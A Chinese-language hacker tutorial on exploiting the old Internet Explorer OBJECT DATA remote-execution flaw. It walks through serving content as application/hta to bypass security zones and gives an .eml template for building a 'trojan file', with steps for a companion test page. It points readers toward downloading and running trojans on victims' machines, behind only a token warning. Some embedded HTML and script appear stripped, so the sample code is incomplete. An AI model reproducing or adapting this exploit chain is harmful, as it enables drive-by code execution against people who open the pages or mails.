由錯誤MIME漏洞的利用想到的

由錯誤MIME漏洞的利用想到的

由錯誤MIME漏洞的利用想到的......
---IE Object Data 數據遠程執行漏洞的利用
作者：冰狐浪子
郵箱：[email protected]
主頁：www.godog.y365.com
測試代碼：http://y365.com/godog/eml/

聲明：因為本文所講方法破壞性極大，可以和錯誤MIME漏洞及com.ms.activeX.ActiveXComponent漏洞相媲美，因此請不要利用本文所講內容用於破壞！否則後果自負！

網友braveboy3來信問我一些問題，信中提到Internet Explorer Object數據遠程執行漏洞，我急忙驅貓上網查看，從綠盟科技上找到了漏洞資料，同時請braveboy3給了一個測試該漏洞的網頁。

下面我結合自己的測試簡單介紹一下這個漏洞：

由於IE處理對象標記OBJECT的DATA標簽時沒有正確處理要被裝載的文件參數，當"OBJECT"標記中用於設置對象的MIME類型的"Type"屬性不為空時，IE會根據標記中的"Type"值裝載文件，此時若控件不安全則IE會提示是否執行，測試代碼如下：

但當"Type"屬性為空時，IE會根據服務器返回的HTTP頭中的Content-Type來處理數據，此時卻沒有充分檢查被裝載的文件屬性，也就是說如果服務器返回的HTTP頭中的Content-Type是application/hta等，那麼腳本就會繞過安全區域限制而能夠執行。（見網友braveboy3提供的測試網頁：http://202.113.125.60/pic/test/test.html）

看到上面的介紹相信大家一定會想到通過更改服務器的MIME映射為：擴展名.hta對應application/hta來利用此漏洞，；而熟悉ASP編程的朋友可能會想到通過用“<%response.ContentType="application/hta"%>”這條語句來設置MIME類型而利用該漏洞（也可用其他的動態網頁語言如：PHP等）。事實上網上此漏洞的利用方法也多為上面兩種方法。可是大多數網友並沒有自己的服務器，而且現在的免費空間卻鮮有支持ASP或其他動態網頁語言的，所以此漏洞利用起來有點困難（老鳥例外，有肉雞呀!呵呵....）

怎麼辦？難道我們只有眼睜睜的看著漏洞從眼皮底下走過？NO!那不是“黑客”行為！

大家對錯誤MIME漏洞耳熟能詳了吧？它的利用借助了eml格式的文件。大家一定還記得“Content-Type: audio/x-wav;”這句代碼吧？它就是用於設置MIME類型的！是不是想到了點什麼？對把它改成“Content-Type: application/hta;”；可怎樣設置OBJECT的DATA標簽的URL地址呢？看MIME漏洞利用中的這句“”，其中src不就是一個URL地址嗎？好啦，都解決拉，下面就讓我們開始打造一個新的木馬文件吧！
下面就是我改好的eml文件源代碼：

MIME-Version: 1.0 /*MIME-多用途的網際郵件擴充協議的版本*/
Content-Type: multipart/related; /*內容類型*/
type="multipart/alternative";
boundary="1" /*分界線*/

--1
Content-Type: multipart/alternative;
boundary="2"

--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable

如果自動打開記事本程序，則說明測試成功！




--2--

--1
Content-Type: application/hta;
Content-Transfer-Encoding: 7bit
Content-ID:

說明：可以自己加入其他代碼或控件




--1--

測試代碼說明:把上面的代碼保存為test.eml,另外再建一個test.htm文件，內容如下：

打開test.htm文件就可以看到結果！
/*和*/之間的內容是注釋可去掉,可以參照《黑客防線》第九期“無堅不摧的殺手锏--利用Windows幫助文件漏洞運行木馬”一文，在不使用com.ms.activeX.ActiveXComponent漏洞（此漏洞早已出現，可能多數已打補丁）情況下，下載執行木馬程序。